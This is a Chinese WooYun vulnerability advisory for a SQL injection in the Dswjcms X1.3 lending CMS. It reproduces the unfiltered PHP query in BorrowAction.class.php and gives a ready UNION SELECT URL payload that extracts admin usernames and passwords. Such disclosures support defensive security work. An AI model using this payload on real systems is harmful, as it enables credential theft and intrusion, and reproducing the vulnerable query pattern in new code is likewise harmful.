当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143722

漏洞标题: Dswjcms! X1.3 sql注入一枚(需要登录会员)

相关厂商:dswjcms.com

漏洞作者: 不能忍

提交时间:2015-10-12 11:11

修复时间:2016-01-10 17:19

公开时间:2016-01-10 17:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-10: 细节向公众公开

简要描述:

Dswjcms借贷系统-Powered by Dswjcms!

详细说明:

下载地址:http://**.**.**.**/Site/article/type/28/id/51.html
漏洞文件:/Lib/Action/Home/BorrowAction.class.php 

public function index(){
		$linkage=$this->borrowLinkage();
		$this->assign('linkage',$linkage);
		//标题、关键字、描述
		$Site = D("Site");
		$site=$Site->field('keyword,remark,title,link')->where('link="'.$_SERVER['REQUEST_URI'].'"')->find();
		$this->assign('si',$site);
		$active['borrow']='active';
		$this->assign('active',$active);
		$head='<link  href="__PUBLIC__/css/style.css" rel="stylesheet">';
		$this->assign('head',$head);
		$Borrow=D("Borrowing");
		$borrow=$Borrow->where('uid='.$this->_session('user_uid').' and id='.$this->_get('mid'))->find();   //直接获取mid进库,没有过滤
		$borrow['data']=array_filter(explode(",",$borrow['data']));
		$this->assign('b',$borrow);
		$this->display();
    }


给个payload:
http://localhost/Borrow/index/?mid=-1) UNION SELECT 1,2,3,concat(username,0x2c,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from ds_admin%23

漏洞证明:

QQ截图20150927130656.jpg


好像要x1.3版本才存在这个漏洞,之前的版本好像不存在

修复方案:

过滤

版权声明:转载请注明来源 不能忍@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-10 17:19

厂商回复:

该漏洞之前已被其它作者发现,并已修复,参考:http://www.wooyun.org/bugs/wooyun-2015-

最新状态:

暂无